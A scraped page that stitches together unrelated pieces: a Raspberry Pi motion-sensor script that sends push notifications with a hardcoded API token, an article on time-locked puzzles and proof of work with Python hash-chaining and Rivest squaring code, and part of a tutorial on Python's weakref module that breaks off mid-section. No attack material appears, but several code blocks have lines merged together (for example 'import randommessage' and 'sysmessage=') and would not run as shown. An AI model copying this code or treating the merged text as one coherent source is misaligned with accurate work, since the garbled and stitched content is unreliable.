import urllib2 import json import RPi.GPIO as GPIO import time def sendNotification(token, channel, message): data = { "body" : message, "message_type" : "text/plain" } req = urllib2.Request('{0}/'.format(channel)) req.add_header('Content-Type', 'application/json') req.add_header('Authorization', 'Token {0}'.format(token)) response = urllib2.urlopen(req, json.dumps(data)) GPIO.setmode(GPIO.BCM) # In BCM mode pin 7 is identified by id 4 PIR_PIN = 4 GPIO.setup(PIR_PIN, GPIO.IN) try: print "Reading PIR status" while True: if GPIO.input(PIR_PIN): sendNotification("4b6e163b7935271b924dbf2fdc7b4b528bd6c6db", "Sample Channel", "Motion detected") print "Motion detected!" except KeyboardInterrupt: print "Exit" GPIO.cleanup()
3 Comments | https://www.open-electronics.org/guest_projects/pushetta-send-push-notifications-from-your-raspberry-pi/ | CC-MAIN-2021-04 | en | refinedweb |
Time Locked Puzzles and Proof of Work
So how might we a lock down a file for a given amount of time or make sure that someone does not get their present until their birthday? Well one way is to get others to do some work, that you know will be done within a certain amount of time. If I know it will take you one hour to cut the grass in your garden, before I give you your reward, I will hope you will not be able to do it quicker than one hour.
Hashing
This method is defined here.
One method is to get the receiver to perform some work to find the encryption key. For example if we wanted to lock it down for one hour we could take a seed value, and then continually hash it for a given amount of time that we thing the recipient would required to generate the same key. This would then generate the same key, if the sender and recipient share the number of iterations of the hash used. We can then tell the receiver the seed value and the number of iterations they must use in order to compute the key, along with the encrypted message. The receiver must then compute the key and prove their work.
The method, though, is not perfect as the cost of the operation will vary with the clock speed of the processor. We will not be able to compute in parallel as the hashing operations must be done one at a time. The other side will still have a cost in the computation. The following is a sample run for a time to compute the key of 0.25 seconds:
Message: The quick brown fox
Keyseed: 12345Encryption key: 6CUlrN1BZPz9ytTrKHDGsbLEj20a15stop5S_0ktCMk=
Encrypted value: gAAAAABbCdAfteG9dAUdmQgqHoY4hby9moK51-qYTRlYXpO7Ghbev6GqDFsadulgmZvgHVUv6mRwE9SRcbF2-UVnDW_KzJs7GHX9ffcZ-btIH-pKP5ubOSE=Decyption key: 6CUlrN1BZPz9ytTrKHDGsbLEj20a15stop5S_0ktCMk=
Decrypted value: The quick brown foxKey time (secs): 0.25
Iterations: 76109Time to encrypt: 0.724999904633
Time to decrypt: 0.219000101089
And here is some sample code. We use SHA-256 to hash the seed.
import datetime
import time
import hashlib
import base64
from cryptography.fernet import Fernet
import sysmessage="hello"
keyseed = "12345"
timeout=0.5def generate_by_time(seed, delta):
end = time.time() + delta.total_seconds()
h = hashlib.sha256(seed).digest()
iters = 0 while time.time() < end:
h = hashlib.sha256(h).digest()
iters += 1 return base64.urlsafe_b64encode(h), iters
def generate_by_iters(seed, iters):
h = hashlib.sha256(seed).digest()
for x in xrange(iters):
h = hashlib.sha256(h).digest()
return base64.urlsafe_b64encode(h)
def encrypt(keyseed, delta, message):
key, iterations = generate_by_time(keyseed, delta)
encrypted = Fernet(key).encrypt(message)
return iterations, encrypted,key
def decrypt(keyseed, iterations, encrypted):
key = generate_by_iters(keyseed, iterations)
decrypted = Fernet(key).decrypt(encrypted)
return decrypted,key
print "Message:\t",message
print "Keyseed:\t",keyseed
delta = datetime.timedelta(seconds=timeout)t1 = time.time()
iters, encrypted,key = encrypt(keyseed, delta, message)
print "\nEncryption key:\t\t",key
print "Encrypted value:\t",encryptedt2 = time.time()
decrypted,key = decrypt(keyseed, iters, encrypted)t3 = time.time()print "\nDecyption key:\t\t",key
print "Decrypted value:\t",decryptedprint "\nKey time (secs):\t", timeout
print "Iterations:\t\t", itersprint "\nTime to encrypt:", t2 - t1
print "Time to decrypt:", t3 - t2
In an extension to this, we could just define the hashed value, and let the receiver work out the number of times a seed value needs to be hashed to get the same value. In this case we search for a hashed version of the key here.
Squaring
This method is defined here.
Ron Rivest [paper] defined a puzzle which was fairly easy to compute [O(log(n))] and more difficult to solve [O(n2)]. For this we create a random value (a) and then raise it to the power of 2^t, and where t is the difficulty level.
The method, as outlined by Rivest [paper] defines the usage of a squaring process which increases the work to compute the key.
Now let’s say that Bob wants to make sure that Alice cannot open a message within a given amount of time. Initially Bob starts with two prime numbers (p) and (q) and determines (n):
n=p×q
We can also calclate PHI as:
PHI=(p−1)×(q−1)
Next we create an encryption key (K) and with a message (M) we encrypt:
Cm=Encrypt(K,M)
Next we select a random value (a) and a difficulty level (t), and compute a value of b which is added to the key (K):
CK=K+a^2{^t} (mod n)
Bob will then send {n,a,t,CK,Cm} to Alice, and get her to prove her work in order to decrypt the cipher message (Cm).
Alice then takes the values and computes the key with:
Key=CK−a^2{^t} (mod n)
and which will have a workload dependent on the difficulty (t).
Bob, though, does not have the same workload at Alice, as he knows some or the original values. For him, he uses PHI to reduce the complexity:
ϵ=2^t (mod PHI)
And then the calculation of the value to find becomes:
b=a^e (mod n)
Message: The quick brown fox
Keyseed: 12345
Key: WZRHGrsBESr8wYFZ9sx0tPURuZgG2lmzyvWpwXPKz8U=
Keyval: 40517827634140982427891826463487354397562163067645485726320510288945209855941
Bob sends this as the puzzle
N: 5808519655638548297258092061418259166774543092617038796300914729783059570485346403807454618287525932811499665099257674691573742312634492877501558241926510855265445655865943438821912402793071410193718769033138895292899984621735782974450454023113374373918673037042253066818942089671557106505473585751547903422068492120948273678721315120463641764405010804880764577517991306650182004053654755677171480098164870018127440284136797039199208818583865459976018367716791615092378912189828151394009348523859513336870704003245896134059043428841497988022873465729540129905401323861892790008954081042521197986890397363455472811639
a: 101
t: 1
CK: 40517827634140982427891826463487354397562163067645485726320510288945209866142
Encrypted: gAAAAABbCrlEUvLDQQX6gIiGqA81TTHzm5rD4Y6c4I5X5-qnkhGzqC8lOojkzmmy4cIJ3WXIn9aKO_5P3VY21ScNDf0wtOsTXo93-GbmwF6-_hBtyInh6g8=
Alice receives and now computesKey guess= 40517827634140982427891826463487354397562163067645485726320510288945209855941
Decrpyted: The quick brown fox
As an example, using a 3.5GHz Xeon process, we get the following timings to compute the work for Alice (with a=999):
t=8 0.000999927520752 seconds
t=16 0.208999872208 seconds
t=18 2.0 seconds
t=20 26.7730000019 seconds
And here is some sample code where we use SHA-256 to hash the seed:
import datetime
import time
import hashlib
import base64
from cryptography.fernet import Fernet
import sys
from base64 import b64decode
import struct
import randommessage="hello"
keyseed = "12345"
a = random.randint(99999,999999)
t= 8def tost(i):
result = []
while i:
result.append(chr(i&0xFF))
i >>= 8
result.reverse()
return ''.join(result)print "Message:\t",message
print "Keyseed:\t",keyseed
p=75184456329323393981453160999168869619896388565246270326667621020749883434526629149123313289822093813309128973674541785507146180116583118006552309466590981238828120901809218798591532127897713278598850326780359769279464340716666681725354754726329143696440538687112219849324721464631600820710676683650403820541
q=77256921699294288099751913986725879141470275753142260831695319390868938092522018978912165340760059157501314281329434440243543281733706145540078343592028736575027896004544593182243130855408638162095082271337507750610446164552740816661833414846974163466111988532153163988528271485739448606877973413411116622979
n = p*qPHI = (p-1)*(q-1)h = hashlib.sha256(keyseed).digest()
key=base64.urlsafe_b64encode(h)encrypted = Fernet(key).encrypt(message)
print "Key:",key
keyval = int(b64decode(key).encode('hex'), 16)print "Keyval:",keyval
CK = ((keyval) + a**(2**t)) % nprint "\n\nBob sends this as the puzzle"
print "N:\t",n
print "a:\t",a
print "t:\t",t
print "CK:\t",CK
print "Encrypted:\t",encrypted
print "\n\nAlice receives and now computes"t1 = time.time()Key = (CK - a**(2**t)) % n
t2 = time.time()val=tost(Key)
Keyguess = base64.urlsafe_b64encode( val)print "\nKey guess (int):",Key
print "Key guess:",Keyguessdecrypted = Fernet(Keyguess).decrypt(encrypted)print "Decrypted:",decrypted
print "Time for Alice to compute:",t2-t1#print "\n\n--------Bob's calculation---------------------"
#t1 = time.time()
#eps = (2**t) % PHI
#b =(a**eps) % n
#t2 = time.time()
#print "Bob\'s value", b
#print "Time for Bob to compute:",t2-t1
Conclusions
Proof of work is one way to define a cost limit to those who might want to change something on a system. But, remember, work can be costly. | https://medium.com/asecuritysite-when-bob-met-alice/time-locked-puzzles-d06d2ee354a6?source=post_internal_links---------6---------------------------- | CC-MAIN-2021-04 | en | refinedweb |
Bike Sheds, Ducks, and Nuclear Reactors
The other day, I learned a new term, and it was great. I enjoyed this so much because it was a term for a concept I was familiar with but for I had never had a word. I haven’t been this satisfied with a new word since “taking pleasure in seeing bad things happen to your enemies” was replaced with “schadenfreude.” I was listening to an episode of the Herding Code podcast from this past summer, and Nik Molnar described something called “bike shedding.”
This colloquialism is derived from an argument made by a man named C. Northcote Parkinson and later called “Parkinson’s Law of Triviality” that more debate within organizations surrounds trivial issues than extremely important ones.
Parkinson’s Law, Explained
Here’s a quick recap of his argument. He discusses a fictional committee with three items on its agenda: approving an atomic reactor, approving a bike shed, and approving a year’s supply of refreshments for committee meetings. The reactor is approved with almost no discussion since it is so staggeringly complicated and expensive than no one can really wrap their heads around it. A lot more arguing will be done about the bike shed, since committee members are substantially more likely to understand the particulars of construction, the cost of materials, etc. The most arguing, however, will be reserved for the subject of which drinks to have a the next meeting, since everyone understands and has an opinion about that.
This is human nature as I’ve experienced it, almost without exception. I can’t tell you how many preposterous meeting discussions have shaved precious hours off of my life while people argue about the most ridiculous things. One of the most common that comes to mind is people who are about to drive somewhere 20 minutes away spending 5-10 minutes arguing about which streets to take en route.
Introducing a Duck
In the life of a programmer, this phenomenon often has special and specific significance. On the Wikipedia page I linked, I also noticed a reference to a fun Jeff Atwood post about awesome programming terms that had been coined by respondents to an old Stack Overflow question. Take a look at number five, a “duck”:.”
Ducks, Applied
When I saw this, I actually guffawed at my desk. I didn’t do that just because I found this funny — I have actually employed this strategy in the past, and I see that I am not alone in my rank cynicism in a world of Parkinson’s Law of Triviality. It definitely seems that project management types, particularly ones that were never technical (or at least never any good at it), feel a great need to seize upon something that they can understand and offer an opinion on that thing in the form of an edict in order basically to assert some kind of dominance.
So, early in my career, when proposing technical plans I developed a habit of dropping a few red herring mistakes into the mix to make sure that obligatory posturing was dispensed with and any remaining criticisms were legitimate — I’d purposely do something like throw in a “we’re not going to be doing any documentation because of a lack of time” to which I would receive the admonition, “documentation is important, so add it in.” “Okie-dokie. Moving on.”
Bike Shedding in the Developer World
It isn’t just pointy-haired fire-hydrant peeing that exposes us to this phenomenon, however. We, as developers, are some of the worst offenders. The Wikipedia article also offers up something called “Wadler’s Law,” which appears to be corollary to Parkinson’s in that it talks about developers being more likely to argue over language syntax than semantics.
In other words, you’ll get furious arguments over whether to use underscores between words in function names, but often hear crickets when you ask if the function is part of a consistent broader abstraction. My experience aligns with this as well. I can think of so, so many depressing code reviews that were all about “that method doesn’t have a doc comment” or “why are you using var” or “alphabetize your includes.” I’d offer up things like “let’s look at how cohesive the types are in this namespace,” and, again, crickets.
The great thing about opinions is that they’re an endlessly renewable, free resource. You can have as many as you like about anything you like, and no one can tell you not to (at least in societies that aren’t barbarically oppressive).
But what isn’t endless is people’s interest in your opinions. If you’re the person that’s offering one up intensely and about every subject as the conversation drifts from code to personal finances to football to craft beers, you’re devaluing your own currency. As you discuss and debate, be mindful of the stakes at play and be sparing when it comes to how many times you sit at the penny slots. After all, you don’t want to be the one remembered for furiously debating camel case and coffee flavors while rubber stamping the plans for Chernobyl.
Hm, I assumed pretty much everyone who knows “yak shaving” knows “bikeshedding”. Maybe that’s false and I’ve been lucky (?) to be exposed to enough bikeshedding to have learned the name long ago. Also, here’s bikeshedding in a tweetshell.
That tweet captures in perfectly. I’ve been in so many code reviews that followed that exact pattern.
[…] Bike Sheds, Ducks, and Nuclear Reactors […]
I first came across the concept of a ‘duck’ under the name ‘neck-bolt’ (ie. a pointless, out-of-place, and obviously tacked-on element in a website design) coined by David Siegel in ‘Secrets of Successful Websites’. Siegel cautioned that no matter how hideous and out-of-place the design element, there was always a chance the client would fall in love with it and resist its later removal. I have had that happen to me a couple of times. Of course, these days we can try falling back on A/B user testing: “The version without the flaming and spinning ‘buy now’ graphic converts 11.5%… Read more »
That’s a good point. A gambit wherein you introduce some false flag change to be corrected out can backfire with the change being applauded, to your horror. | https://daedtech.com/bike-sheds-ducks-and-nuclear-reactors/ | CC-MAIN-2021-04 | en | refinedweb |
Detecting request from mobile device
Take control over what is and what is not mobile device for your web app
Microsoft made is easy to detect whether request to your web application is coming from mobile device or not by adding a property to Request class. Usage of this is Request.Browser.IsMobileDevice.
This works pretty fine for most of mobile devices, but this property is based on list of mobile browsers which is configured in .NET framework itself.
Now-days, when mobile devices industry is growing, you might get wrong mobile device recognition by using this approach because of the simple reason and that is .NET framework configuration is not updating automatically when mobile device platform is published.
You can always update definition file, but you will need to have full access to your server machine, so this will not work if you are using shared host.
Browser definition files are stored in folder C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\Browsers
What you can do is to extend Request class with another method which will check UserAgent name. Keywords of UserAgent names for mobile browsers you can store in web.config as a comma separated value.
<appSettings> <add key="mobileBrowsers" value="Blackberry,BB10,iPad,iPhone,Windows Phone,Windows CE"/> </appSettings>
Create extension method for Request which compares this list of values with request user agent name.
public static bool IsMobile(this HttpRequest request) { foreach (string mobileBrowser in System.Web.Configuration.WebConfigurationManager.AppSettings["mobileBrowsers"].Split(',')) { if (request.UserAgent.ToLower().Contains(mobileBrowser.Trim().ToLower())) { return true; } } return false; }
After including namespace in which this extension is declared you can easily check whether page is accessed from mobile device with Request.IsMobile().
If new device or platform with specific signature keyword, you can easily add and enable your website to recognize it.
References
-
-
Disclaimer
Purpose of the code contained in snippets or available for download in this article is solely for learning and demo purposes. Author will not be held responsible for any failure or damages caused due to any other usage. | https://dejanstojanovic.net/aspnet/2014/april/detecting-request-from-mobile-device/ | CC-MAIN-2021-04 | en | refinedweb |
Introduction to WCF Interview Questions and Answers
WCF stands for the Windows communication foundation. It is a framework that will be used for building service-oriented applications. With the help of the Windows Communication Foundation, You can send any kind of asynchronous message from one point to another point. The services which all are created by WCF can be accessed by different protocols, for example, HTTP, TCP, msmq etc.
Now, if you are looking for a job that is related to WCF then you need to prepare for the 2020 WCF Interview Questions. It is true that every interview is different as per the different job profiles. Here, we have prepared the important WCF Interview Questions and Answers which will help you get success in your interview.
In this 2020 WCF Interview Questions article, we shall present 21 most important and frequently asked interview questions. These questions will help students build their concepts around WCF and help them to crack the interview. These questions are divided into two parts are as follows:
Part 1 – WCF Interview Questions (Basic)
This first part covers basic Interview Questions and Answers.
Q1. What do you mean by WCF?
Answer:
WCF (Windows Communication Foundation) is a framework that is used to build service-oriented applications.
Q2. Explain the fundamentals of WCF
Answer:
The fundamentals of WCF are given below:
- Unification – (COM+ Services, Web Services, .NET Remoting, Microsoft Message Queuing)
- Interoperability
- Service Orientation
Q3. What is the need for WCF?
Answer:
This is the basic WCF Interview Questions asked in an interview. We need WCF because the service created by using WCF will be supported by different protocols.
Q4. What are the Features of WCF?
Answer:
Service Orientation, Interoperability, Service Metadata, Data Contracts, Security, Transactions, AJAX and REST Support, Extensibility.
Q5. Describe the advantages of WCF.
Answer:
Service-Oriented, location Independent, Language-Independent, Platform Independent, Support Multiple Operations, It supports all kinds of protocol.
Q6. What is the difference between WCF and Web Services?
Answer:
WCF is a framework which is used to build service-oriented application while Web Services are the application logic which will be accessed over the web protocols. Web Services will be hosted on the IIS while WCF can be launched on IIS and self-hosted.
Q7. Explain about SOA?
Answer:
It stands for Service-oriented Architecture, It’s an architectural approach to software development.
Q8. What do you mean by service contract in WCF?
Answer:
A service contract is the service compatibility and need of the customers will be bound up with the service mechanism.
Q9. What are the components of the WCF application?
Answer:
WCF application consists of 3 components:
- WCF Service
- WCF Service Host
- WCF service client
Q10. What are the isolation levels provided in WCF?
Answer:
Isolation levels provided in WCF are given below:
- Read Uncommitted.
- Read Committed.
- Repeated read.
Part 2 – WCF Interview Questions (Advanced)
Let us now have a look at the advanced Interview Questions.
Q11. What is the various address format of WCF?
Answer:
Address format of WCF are given below:
- HTTP format
- TCP format
- MSMQ format
Q12. What do you mean by Data Contract Serializer?
Answer:
This is the frequently asked WCF Interview Questions in an interview. when the object instance changes into a portable and visible format that process is known a Serialization and data serialization is also known as Datacontractserilizer.
Q13. Describe the binding in WCF?
Answer:
The binding in WCF are listed below:
- Basic HTTP Binding
- NetTcp Binding
- WSHttp Binding
- NetMsmq Binding
Q14. What is the namespace name used for WCF service?
Answer:
ServiceModel service is used for WCF service.
Q15. What are the MEPs of WCF?
Answer:
The MEPs of WCF are given below:
- DataGram
- Request and Response
- Duplex
Q16. What kind of transaction manager is supported by WCF?
Answer:
They are as follows:
- Lightweight
- WS- Atomic Transaction
- OLE
Q17. What are the different Data contacts in WCF?
Answer:
Different Data contacts in WCF are given below:
- Data Contact
- Data Member
Q18.What are the different instance modes of WCF?
Answer:
Different instance modes of WCF are given below:
- Per Call
- Per Session
- Single
Let us move to the next WCF Interview Questions
Q19. What are the different ways of Hosting Webservices?
Answer:
The WCF service can be hosted in the following ways:
- IIS
- Self Hosting
- WAS (Windows Activation Service)
Q20. What are the different transport schemas supported by WCF?
Answer:
The transported schemas are given below:
- HTTP
- TCP
- Peer network
- IPC
- MSMQ
Q21. Explain different types of Contract defines in WCF?
Answer:
There are four contracts:
- Service Contracts
- Data Contracts
- Fault Contracts
- Message Contracts
Conclusion:
These are the above questions which are very important for WCF (Windows communication foundation) but you should have the hands-on that. For a career point of view, it’s a very new and advanced technology and resources also not much available.
Recommended Articles
This has been a guide to the list of WCF Interview Questions and Answers so that the candidate can crackdown these Interview Questions easily. You may also look at the following articles to learn more – | https://www.educba.com/wcf-interview-questions/?source=leftnav | CC-MAIN-2021-04 | en | refinedweb |
How do I find the Index of the smallest number in an array in python if I have multiple smallest numbers and want both indexes?
numpy argsort
get index of max value in numpy array python
numpy argpartition
numpy partition
numpy argmin
numpy get n smallest values
numpy find index of values greater than
I have an array in which I want to find the index of the smallest elements. I have tried the following method:
distance = [2,3,2,5,4,7,6] a = distance.index(min(distance))
This returns 0, which is the index of the first smallest distance. However, I want to find all such instances, 0 and 2. How can I do this in Python?
You may enumerate array elements and extract their indexes if the condition holds:
min_value = min(distance) [i for i,n in enumerate(distance) if n==min_value] #[0,2]
Find K smallest and largest values and its indices in a numpy array , To find the maximum and minimum value in an array you can use numpy argmax and argmin function. These two functions( argmax and argmin )� Python Program to find the Smallest Number in a List Example 2. This python program is the same as above. But this time, we are allowing the user to enter the length of a List.
Use np.where to get all the indexes that match a given value:
import numpy as np distance = np.array([2,3,2,5,4,7,6]) np.where(distance == np.min(distance))[0] Out[1]: array([0, 2])
Numpy outperforms other methods as the size of the array grows:
Results of TimeIt comparison test, adapted from Yannic Hamann's code below
Length of Array x 7 Method 1 10 20 50 100 1000 Sorted Enumerate 2.47 16.291 33.643 List Comprehension 1.058 4.745 8.843 24.792 Numpy 5.212 5.562 5.931 6.22 6.441 6.055 Defaultdict 2.376 9.061 16.116 39.299
Python - Find the indices for k Smallest elements, Sometimes, while working with Python lists, we can have a problem in which we This task can occur in many domains such as web development and while Let's discuss a certain way to find indices of K smallest elements in list. If you like GeeksforGeeks and would like to contribute, you can also write� To find largest and smallest number in a list. Approach : Read input number asking for length of the list using input() or raw_input(). Initialise an empty list lst = []. Read each number using a
Surprisingly the
numpy answer seems to be the slowest.
Update: Depends on the size of the input list.
import numpy as np import timeit from collections import defaultdict def weird_function_so_bad_to_read(distance): se = sorted(enumerate(distance), key=lambda x: x[1]) smallest_numb = se[0][1] # careful exceptions when list is empty return [x for x in se if smallest_numb == x[1]] # t1 = 1.8322973089525476 def pythonic_way(distance): min_value = min(distance) return [i for i, n in enumerate(distance) if n == min_value] # t2 = 0.8458914929069579 def fastest_dont_even_have_to_measure(np_distance): # np_distance = np.array([2, 3, 2, 5, 4, 7, 6]) min_v = np.min(np_distance) return np.where(np_distance == min_v)[0] # t3 = 4.247801031917334 def dd_answer_was_my_first_guess_too(distance): d = defaultdict(list) # a dictionary where every value is a list by default for idx, num in enumerate(distance): d[num].append(idx) # for each number append the value of the index return d.get(min(distance)) # t4 = 1.8876687170704827 def wrapper(func, *args, **kwargs): def wrapped(): return func(*args, **kwargs) return wrapped distance = [2, 3, 2, 5, 4, 7, 6] t1 = wrapper(weird_function_so_bad_to_read, distance) t2 = wrapper(pythonic_way, distance) t3 = wrapper(fastest_dont_even_have_to_measure, np.array(distance)) t4 = wrapper(dd_answer_was_my_first_guess_too, distance) print(timeit.timeit(t1)) print(timeit.timeit(t2)) print(timeit.timeit(t3)) print(timeit.timeit(t4))
numpy.amin(), Python's numpy module provides a function to get the minimum If it's provided then it will return for array of min values along the axis i.e. Get the array of indices of minimum value in numpy array using numpy.where() i.e. Tuple of arrays returned : (array([0, 2], dtype=int32), array([0, 2], dtype=int32)). C Program to Find Smallest Number in an Array. In this C Program to find the smallest number in an array, we declared 1 One Dimensional Arrays a[] of size 10.We also declared i to iterate the Array elements, the Smallest variable to hold the smallest element in an Array.
We can use an interim dict to store indices of the list and then just fetch the minimum value of distance from it. We will also use a simple for-loop here so that you can understand what is happening step by step.
from collections import defaultdict d = defaultdict(list) # a dictionary where every value is a list by default for idx, num in enumerate(distance): d[num].append(idx) # for each number append the value of the index d.get(min(distance)) # fetch the indices of the min number from our dict [0, 2]
How do I find the indices of the maximum (or minimum) value of my , Learn more about maximum, minimum, max, min, index, array, matrix, find, I would like to know how to find the indices of just the maximum (or minimum) value. The "min" and "max" functions in MATLAB return the index of the minimum and maximum values, respectively, I got two indices, both have the same value. Given a list of numbers, the task is to write a Python program to find the smallest number in given list. Examples: Input : list1 = [10, 20, 4] Output : 4 Input : list2 = [20, 10, 20, 1, 100] Output : 1
You can also do the following
list comprehension
distance = [2,3,2,5,4,7,6] min_distance = min(distance) [index for index, val in enumerate(distance) if val == min_distance] >>> [0, 2]
Chapter 7: Arrays, We need a way to declare many variables in one step and then be able to store and access Like Strings, arrays use zero-based indexing, that is, array indexes start with 0. If we changed the numbers array to have a different number of elements, this code sort(array), rearranges the values to go from smallest to largest. Java program to find largest and second largest in an array: Find the index of the largest number in an array: find largest and smallest number in an array in java: find the second smallest number in an array in java: Find the index of the smallest number in an array: Spring mvc hello world example for beginners: Spring MVC tutorial with examples
8.6. array — Efficient arrays of numeric values — Python 2.7.18 , On narrow Unicode builds this is 2-bytes, on wide builds this is 4-bytes. Array objects support the ordinary sequence operations of indexing, slicing, When using slice assignment, the assigned value must be an array object with the Return the smallest i such that i is the index of the first occurrence of x in the array . Python | Largest, Smallest, Second Largest, Second Smallest in a List 29-11-2017 Since, unlike other programming languages, Python does not have arrays, instead, it has list.
Sorting Arrays, This section covers algorithms related to sorting values in NumPy arrays. science courses: if you've ever taken one, you probably have had dreams (or, For example, a simple selection sort repeatedly finds the minimum value from a list, [1 2 3 4 5]. A related function is argsort , which instead returns the indices of the� As our array arr is a flat 1D array, so returned tuple will contain only one array of indices and contents of the returned array result[0] are, [ 4 7 11] Get the first index of element with value 15,
9. Lists — How to Think Like a Computer Scientist: Learning with , A list is an ordered set of values, where each value is identified by an index. With all these ways to create lists, it would be disappointing if we couldn't assign list Since strings are immutable, Python optimizes resources by making two names Since variables refer to objects, if we assign one variable to another, both� In this article we will discuss how to find the minimum or smallest value in a Numpy array and it’s indices using numpy.amin(). numpy.amin() Python’s numpy module provides a function to get the minimum value from a Numpy array i.e.
- get the smallest number, and then linearly iterate, get all the indexes for that number.
- Why would you calculate the minimum for every iteration?
- @YannicHamann Nothing surprising at all. I ran these tests before posting my answer. NumPy is not a silver bullet.
- Interesting. I would not have expected that. I wonder why that is the case?
- when you compare distance of the type
numpy.ndarraywith an integer it always evaluates the FULL array.
- I think this brings up an important point: numpy shines in efficient computation with very large arrays. For small arrays, numpy may not be the most efficient, as you have clearly pointed out. But numpy is much more scalable than most other methods. This discussion contains some relevant explanation.
- No problem. I made the plot above in Excel, because it was quick.
- I re-made the plot using Matplotlib.
- I ran some additional tests using your code which show how numpy performs well even as the array size increases dramatically.
- How is this different from my previously posted answer?
- @DYZ I think we both posted the answer at the same time. Or do you have any reason to suggest that my answer came from your? What if I turned around and asked you the same question?
- Calculating the minimum for every iteration seems wasteful in both of your answers. | http://thetopsites.net/article/55189626.shtml | CC-MAIN-2021-04 | en | refinedweb |
Created on 2008-08-09 02:26 by daishiharada, last changed 2020-01-12 20:44 by miss-islington. This issue is now closed.
I am testing python 2.6 from SVN version: 40110
I tried the following, based on the documentation
and example in the ast module. I would expect the
second 'compile' to succeed also, instead of
throwing an exception.
Python 2.6b2+ (unknown, Aug 6 2008, 18:05:08)
[GCC 4.2.3 (Ubuntu 4.2.3-2ubuntu7)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import ast
>>> a = ast.parse('foo', mode='eval')
>>> x = compile(a, '<unknown>', mode='eval')
>>> class RewriteName(ast.NodeTransformer):
... def visit_Name(self, node):
... return ast.copy_location(ast.Subscript(
... value=ast.Name(id='data', ctx=ast.Load()),
... slice=ast.Index(value=ast.Str(s=node.id)),
... ctx=node.ctx
... ), node)
...
>>> a2 = RewriteName().visit(a)
>>> x2 = compile(a2, '<unknown>', mode='eval')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: required field "lineno" missing from expr
>>>
This is actually not a bug. copy_location does not work recursively.
For this example it's more useful to use the "fix_missing_locations"
function which traverses the tree and copies the locations from the
parent node to the child nodes:
import ast
a = ast.parse('foo', mode='eval')
x = compile(a, '<unknown>', mode='eval')
class RewriteName(ast.NodeTransformer):
def visit_Name(self, node):
return ast.Subscript(
value=ast.Name(id='data', ctx=ast.Load()),
slice=ast.Index(value=ast.Str(s=node.id)),
ctx=node.ctx
)
a2 = ast.fix_missing_locations(RewriteName().visit(a))
I am reopening this as a doc bug because RewriteName is a copy (with 'ast.' prefixes added) of a buggy example in the doc. The bug is that the new .value Name and Str attributes do not get the required 'lineno' and 'col_offset' attributes. As Armin said, copy_location is not recursive and does not fix children of the node it fixes. Also, the recursive .visit method does not recurse into children of replacement nodes (and if it did, the new Str node would still not be fixed).
The fix could be to reuse the Name node and add another copy_location call: the following works.
def visit_Name(self, node):
return ast.copy_location(
ast.Subscript(
value=node,
slice=ast.Index(value=ast.copy_location(
ast.Str(s=node.id), node)),
ctx=node.ctx),
node)
but I think this illustrates that comment in the fix_missing_locations() entry that locations are "tedious to fill in for generated nodes". So I think the doc fix should use Armin's version of RewriteName and say to call fix_missing_locations on the result of .visit if new nodes are added. (I checked that his code still works in 3.5).
The entry for NodeTransformer might mention that .visit does not recurse into replacement nodes.
The missing lineno error came up in this python-list thread:
I re-verified the problem, its presence in the doc, and the fix with 3.9.
New changeset 6680f4a9f5d15ab82b2ab6266c6f917cb78c919a by Pablo Galindo (Batuhan Taşkaya) in branch 'master':
bpo-3530: Add advice on when to correctly use fix_missing_locations in the AST docs (GH-17172)
New changeset e222b4c69f99953a14ded52497a9909e34fc3893 by Miss Islington (bot) in branch '3.7':
bpo-3530: Add advice on when to correctly use fix_missing_locations in the AST docs (GH-17172)
New changeset ef0af30e507a29dae03aae40459b9c44c96f260d by Miss Islington (bot) in branch '3.8':
bpo-3530: Add advice on when to correctly use fix_missing_locations in the AST docs (GH-17172) | https://bugs.python.org/issue3530 | CC-MAIN-2021-04 | en | refinedweb |
weakref – Garbage-collectable references to objects¶
The weakref module supports weak references to objects. A normal reference increments the reference count on the object and prevents it from being garbage collected. This is not always desirable, either when a circular reference might be present or when building a cache of objects that should be deleted when memory is needed.
References¶
Weak references to your objects are managed through the ref class. To retrieve the original object, call the reference object.
import weakref class ExpensiveObject(object): def __del__(self): print '(Deleting %s)' % self obj = ExpensiveObject() r = weakref.ref(obj) print 'obj:', obj print 'ref:', r print 'r():', r() print 'deleting obj' del obj print 'r():', r()
In this case, since obj is deleted before the second call to the reference, the ref returns None.
$ python weakref_ref.py obj: <__main__.ExpensiveObject object at 0x10046d410> ref: <weakref at 0x100467838; to 'ExpensiveObject' at 0x10046d410> r(): <__main__.ExpensiveObject object at 0x10046d410> deleting obj (Deleting <__main__.ExpensiveObject object at 0x10046d410>) r(): None
Reference Callbacks¶
The ref constructor takes an optional second argument that should be a callback function to invoke when the referenced object is deleted.
import weakref class ExpensiveObject(object): def __del__(self): print '(Deleting %s)' % self def callback(reference): """Invoked when referenced object is deleted""" print 'callback(', reference, ')' obj = ExpensiveObject() r = weakref.ref(obj, callback) print 'obj:', obj print 'ref:', r print 'r():', r() print 'deleting obj' del obj print 'r():', r()
The callback receives the reference object as an argument, after the reference is “dead” and no longer refers to the original object. This lets you remove the weak reference object from a cache, for example.
$ python weakref_ref_callback.py obj: <__main__.ExpensiveObject object at 0x10046c610> ref: <weakref at 0x100468890; to 'ExpensiveObject' at 0x10046c610> r(): <__main__.ExpensiveObject object at 0x10046c610> deleting obj callback( <weakref at 0x100468890; dead> ) (Deleting <__main__.ExpensiveObject object at 0x10046c610>) r(): None
Proxies¶
Instead of using ref directly, it can be more convenient to use a proxy. Proxies can be used as though they were the original object, so you do not need to call the ref first to access the object.
import weakref class ExpensiveObject(object): def __init__(self, name): self.name = name def __del__(self): print '(Deleting %s)' % self obj = ExpensiveObject('My Object') r = weakref.ref(obj) p = weakref.proxy(obj) print 'via obj:', obj.name print 'via ref:', r().name print 'via proxy:', p.name del obj print 'via proxy:', p.name
If the proxy is access after the referent object is removed, a ReferenceError exception is raised.
$ python weakref_proxy.py via obj: My Object via ref: My Object via proxy: My Object (Deleting <__main__.ExpensiveObject object at 0x10046b490>) via proxy: Traceback (most recent call last): File "weakref_proxy.py", line 26, in <module> print 'via proxy:', p.name ReferenceError: weakly-referenced object no longer exists
Cyclic References¶
One use for weak references is to allow cyclic references without preventing garbage collection. This example illustrates the difference between using regular objects and proxies when a graph includes a cycle.
First, we need a Graph class that accepts any object given to it as the “next” node in the sequence. For the sake of brevity, this Graph supports a single outgoing reference from each node, which results in boring graphs but makes it easy to create cycles. The function demo() is a utility function to exercise the graph class by creating a cycle and then removing various references.
